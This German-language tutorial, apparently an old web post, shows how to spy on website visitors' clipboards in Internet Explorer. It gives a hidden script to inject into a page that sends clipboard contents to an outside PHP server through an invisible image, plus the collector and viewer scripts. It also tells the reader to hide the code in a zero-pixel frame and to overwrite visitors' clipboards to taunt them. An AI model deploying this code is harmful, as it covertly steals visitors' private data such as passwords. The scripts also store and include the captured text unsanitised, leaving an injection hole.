Der Internet Explorer bietet die Möglichkeit, per Javascript sowohl lesend als auch schreibend auf die Zwischenablage zuzugreifen. Schreiben macht man mit

window.clipboardData.setData('Text','SPAM');

lesen mit

window.clipboardData.getData('Text');

Nun ist es ein leichtes, das Clipboard auszulesen und abzuspeichern. Das Script funktioniert extern, d.h. nur das Script selber muss auf einem PHP-fähigen Server wie zb. tripod.de liegen. Der folgende Part kommt in den Quelltext der Auszuspionierenden Seite:

<script language="JavaScript">
a = window.clipboardData.getData('Text');
document.writeln("<img src=\"http://dieAdressezurphpdatei/clip.php?clip="+a+"\" width=0 height=0>");
</script>

Möchte man den Besucher ärgern, kann man den Befehl

window.clipboardData.setData('Text','Sie wurden gehackt');

oder ähnliches hinter den document.writeln Befehl einfügen.

Code möglichst versteckt (am besten in einem 0 Pixel großen Frame) unterbringen, da Sonderzeichen (z.B. wenn einer Quellcode im Clipboard hat) Fehler verursachen.

Die Auslese-Datei heißt hier clip.php und hat folgenden Inhalt:

<?php
$file = "clip.dat";

if($clip != "" && $clip != "null"){
$tmp = fopen($file, "a");
fputs($tmp,"$clip<hr>\n");
fclose($tmp);
}
?>

Weiterhin muss die bei $file angegebene Datei existieren (in diesem Fall clip.dat). In sie werden die Clipboard-Daten geschrieben. Die folgende Datei ist für die Anzeige zuständig und heißt z.B. auswertung.php:

<html>
<head>
<title>Clipboard-Spy</title>
</head>
<body bgcolor="#B6D7DE">
<p>
<?PHP
include 'clip.dat';
?>
</p>
</body>
</html>

Ruft man sie im Browser auf, kann man die erschnüffelten Clipboards sehen.

ACHTUNG : Nutzung auf eigene Verantwortung